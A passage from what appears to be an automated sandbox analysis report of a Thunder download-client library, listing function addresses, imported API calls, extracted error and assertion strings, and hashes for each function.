                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(filter_domins), ref: 100B0489
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100B04A0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B04DC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B04EE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B0500
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100B0584
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@
                                                                                                                                              • String ID: filter_domins$partner_flow_statisitics
                                                                                                                                              • API String ID: 2848398397-1528627388
                                                                                                                                              • Opcode ID: d111b9089da81879c2a06e0cea707453ce404e3e819cf763a85ec19a4e507b9c
                                                                                                                                              • Instruction ID: 8ad1faf4671a6cd7ac1a040e9295f23e6b233ae6163b6ecc0ec03b88e67e8b64
                                                                                                                                              • Opcode Fuzzy Hash: d111b9089da81879c2a06e0cea707453ce404e3e819cf763a85ec19a4e507b9c
                                                                                                                                              • Instruction Fuzzy Hash: D5511475508780DFC324CF28C488A9AFBE5FF98304F108A4EE59A87361DB70A949CF52
                                                                                                                                              Function 100453E3 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 59COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 10045427
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 10045436
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL handshake: InitializeSecurityContext call error), ref: 10045443
                                                                                                                                                • Part of subcall function 1002BD70: ??0exception@@QAE@XZ.MSVCR71(?,?,00000000,102423C9,000000FF,1021B19D,00000000,?,10056267), ref: 1002BD8D
                                                                                                                                                • Part of subcall function 1002BD70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002BDA9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0,?), ref: 1004546B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL handshake: InitializeSecurityContext throw exception,?,102B6AA0,?), ref: 10045478
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0,?), ref: 1004549D
                                                                                                                                              Strings
                                                                                                                                              • SSL handshake: send data to server error! throw exception, xrefs: 10045420
                                                                                                                                              • SSL handshake: InitializeSecurityContext throw exception, xrefs: 10045470
                                                                                                                                              • SSL handshake: InitializeSecurityContext call error, xrefs: 1004543B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@ExceptionThrowU?$char_traits@V?$allocator@$??0exception@@$V01@@
                                                                                                                                              • String ID: SSL handshake: InitializeSecurityContext call error$SSL handshake: InitializeSecurityContext throw exception$SSL handshake: send data to server error! throw exception
                                                                                                                                              • API String ID: 2168885925-671814026
                                                                                                                                              • Opcode ID: 1ae056671355d9a1fe21aa6f684533c0b54a1985a5b97082c97ff5e499183df1
                                                                                                                                              • Instruction ID: b232f74e91d83f86246f6d5d54e421f2cc67f8c6baccbbaa1f3ada6061949030
                                                                                                                                              • Opcode Fuzzy Hash: 1ae056671355d9a1fe21aa6f684533c0b54a1985a5b97082c97ff5e499183df1
                                                                                                                                              • Instruction Fuzzy Hash: B3213BB5900209DBCB14DF94C888EEEB778FB5D314F508299E91AA7242DB356A45CF20
                                                                                                                                              Function 100A5290 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)), ref: 100A52B1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A52C8
                                                                                                                                                • Part of subcall function 1000F0E0: _itoa.MSVCR71 ref: 1000F107
                                                                                                                                                • Part of subcall function 1000F0E0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,1001F579), ref: 1000F117
                                                                                                                                                • Part of subcall function 10071E70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071EC9
                                                                                                                                                • Part of subcall function 10071E70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10071F4C
                                                                                                                                                • Part of subcall function 10071E70: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071F66
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100A5315
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5324
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5333
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5341
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5353
                                                                                                                                              Strings
                                                                                                                                              • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727), xrefs: 100A52A8
                                                                                                                                              • user_agent_array, xrefs: 100A52B7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$?assign@?$basic_string@V01@@V12@V12@@_itoa
                                                                                                                                              • String ID: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)$user_agent_array
                                                                                                                                              • API String ID: 78673402-3191899580
                                                                                                                                              • Opcode ID: 06974d58797959b00f75952663ab4e95c96d215498ba35ef77035bed134d7c84
                                                                                                                                              • Instruction ID: 172c9ffba54d4b6c219fab103fb2e0ca2c98e76c175490010316878f0f15c10d
                                                                                                                                              • Opcode Fuzzy Hash: 06974d58797959b00f75952663ab4e95c96d215498ba35ef77035bed134d7c84
                                                                                                                                              • Instruction Fuzzy Hash: A3216675008791DFE364DB64C88CB5ABBE4BBA8B44F108A4CF1A9822A1DB745149CF13
                                                                                                                                              Function 100D81B0 Relevance: 15.1, APIs: 10, Instructions: 71COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,?,10251410,000000FF,100B29F3), ref: 100D81DC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10251410,000000FF,100B29F3), ref: 100D81ED
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10251410,000000FF,100B29F3), ref: 100D81FE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10251410,000000FF,100B29F3), ref: 100D820C
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,10251410,000000FF,100B29F3), ref: 100D821C
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,10251410,000000FF,100B29F3), ref: 100D822F
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,10251410,000000FF,100B29F3), ref: 100D8242
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,10251410,000000FF,100B29F3), ref: 100D8255
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,10251410,000000FF,100B29F3), ref: 100D8268
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(00000001,?,?,?,10251410,000000FF,100B29F3), ref: 100D827B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2599707790-0
                                                                                                                                              • Opcode ID: ba9809d7f51b612ecd8e2f388364a55e5fcc6119157c5c634e88edf9796c3661
                                                                                                                                              • Instruction ID: 93a8e2114440217d549844cc9e03205d5a79c2526d4627cb7f14ecbb7b726cdd
                                                                                                                                              • Opcode Fuzzy Hash: ba9809d7f51b612ecd8e2f388364a55e5fcc6119157c5c634e88edf9796c3661
                                                                                                                                              • Instruction Fuzzy Hash: A5216DF1900B818FD720CF29D889A16B7E9EB64B00F544E1DF08B83651E775F948CB62
                                                                                                                                              Function 100E0030 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 269COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100E01D9
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                                                                                                                              • String ID: gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                              • API String ID: 2879367404-1817264047
                                                                                                                                              • Opcode ID: 1b11005ae3134cbe68bfdf80503d9201309f2c8ad3a69f5bba383e1940776219
                                                                                                                                              • Instruction ID: 505939ffbcb4e52afc12437367ccb8275b8fc85a7873ba161612ee64f89865fc
                                                                                                                                              • Opcode Fuzzy Hash: 1b11005ae3134cbe68bfdf80503d9201309f2c8ad3a69f5bba383e1940776219
                                                                                                                                              • Instruction Fuzzy Hash: A69194B5B006499FC718CF6EDC85AAF77A9EB88300B14C62CF81ADB745E670F9408791
                                                                                                                                              Function 100B4350 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 261COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,00000014), ref: 100B4554
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,00000014,00000000), ref: 100B4585
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,?,00000000), ref: 100B45FC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,?,00000000), ref: 100B460E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,?,00000000), ref: 100B4623
                                                                                                                                                • Part of subcall function 100B3A20: __RTDynamicCast.MSVCR71(?,00000000,103010A4,103010CC,00000000,?,?,?), ref: 100B3A86
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100B23A3
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B23B4
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B23EB
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2400
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B2424
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2438
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000001,00000000), ref: 100B246D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?assign@?$basic_string@V12@V12@@$??0?$basic_string@$CastDynamic
                                                                                                                                              • String ID: -1 == _exit_state$.\p2s_task_event_handler.cpp$thunder_assert
                                                                                                                                              • API String ID: 4250959581-1101966026
                                                                                                                                              • Opcode ID: 9443df39a1745c4cb97400de2d8a80f558436efc303da345ad0f3e1b89e51129
                                                                                                                                              • Instruction ID: 412871d0c7b36312365f7c4b771bcf564c9cb0fc76647ed8d1ce5ce5f669ff94
                                                                                                                                              • Opcode Fuzzy Hash: 9443df39a1745c4cb97400de2d8a80f558436efc303da345ad0f3e1b89e51129
                                                                                                                                              • Instruction Fuzzy Hash: 97B147782047409FD724CF64C898BABB7E5FF99704F10894DF59A8B392CB70A945CB62
                                                                                                                                              Function 100DC067 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100DC06B
                                                                                                                                              • _CxxThrowException.MSVCR71(00000000,00000000), ref: 100DC077
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100DC110
                                                                                                                                                • Part of subcall function 10013C80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CStringSetter,00000000,?,?,10240554,000000FF,1000417F,?), ref: 10013CA9
                                                                                                                                                • Part of subcall function 10013C80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10013CCF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100DC19D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100DC1DB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100DC30B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100DC36D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$??3@ExceptionThrow
                                                                                                                                              • String ID: c
                                                                                                                                              • API String ID: 3557001210-112844655
                                                                                                                                              • Opcode ID: fac8e13122407e6d6c43d1616c8eb93b76abaa9944e9c092ad5271ba9f3b0c4e
                                                                                                                                              • Instruction ID: 13f959d57bd99b367c6b110419a10df5ea05600ad0fa2ba205fd4f251623530b
                                                                                                                                              • Opcode Fuzzy Hash: fac8e13122407e6d6c43d1616c8eb93b76abaa9944e9c092ad5271ba9f3b0c4e
                                                                                                                                              • Instruction Fuzzy Hash: 7AA12534608386DFD764CF68C484B9AB7E4FF9A344F108A5CF49987352DB30A949CB62
                                                                                                                                              Function 100A5430 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00002001), ref: 100A54A8
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A557C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5597
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@?assign@?$basic_string@V12@V12@@
                                                                                                                                              • String ID: (unsigned)_small_file_pos < _process_full_paths.size()$.\http_data_pipe.cpp$_cur_process_path_pos < _process_full_paths.size()$_small_file_pos >= 0$thunder_assert
                                                                                                                                              • API String ID: 218246552-3633025600
                                                                                                                                              • Opcode ID: aac9dd0960bf7aa4487619e36d22f9b1c396f195d8bc8d7f97cba805ed7b323f
                                                                                                                                              • Instruction ID: 17da6f2e0fa8c39346490aae4f690070fc1d3d2cfbf84df3fe30b116cd8d4f38
                                                                                                                                              • Opcode Fuzzy Hash: aac9dd0960bf7aa4487619e36d22f9b1c396f195d8bc8d7f97cba805ed7b323f
                                                                                                                                              • Instruction Fuzzy Hash: 5641DF34A00605DBCB24DFB8DC58BEAB7F4FB59706F04496DE966E7282DB31A940CB50
                                                                                                                                              Function 1003D6D0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 84COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ReadFileScatter.KERNEL32(?,?,?,00000000,?), ref: 1003D769
                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,?), ref: 1003D774
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(fast read error,?,?,00000000,?), ref: 1003D793
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC,?,00000000,?,?,00000000,?), ref: 1003D7B9
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionFileH_prologLastReadScatterThrowV01@@
                                                                                                                                              • String ID: .\asyn_file_device.cpp$fast read error$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 395322642-553302609
                                                                                                                                              • Opcode ID: af78665bf8bbabe84a4a0182e6462252fb12b4621f59a11f58adce9334e26862
                                                                                                                                              • Instruction ID: 953e148f4c94a03fd2c5e029746f81d50d15b0ffdec938b4de73036a4b544f79
                                                                                                                                              • Opcode Fuzzy Hash: af78665bf8bbabe84a4a0182e6462252fb12b4621f59a11f58adce9334e26862
                                                                                                                                              • Instruction Fuzzy Hash: 00316F79104780AFC325DF68C894FABB7E8FB99314F408A1DF59A87641DB30B449CBA1
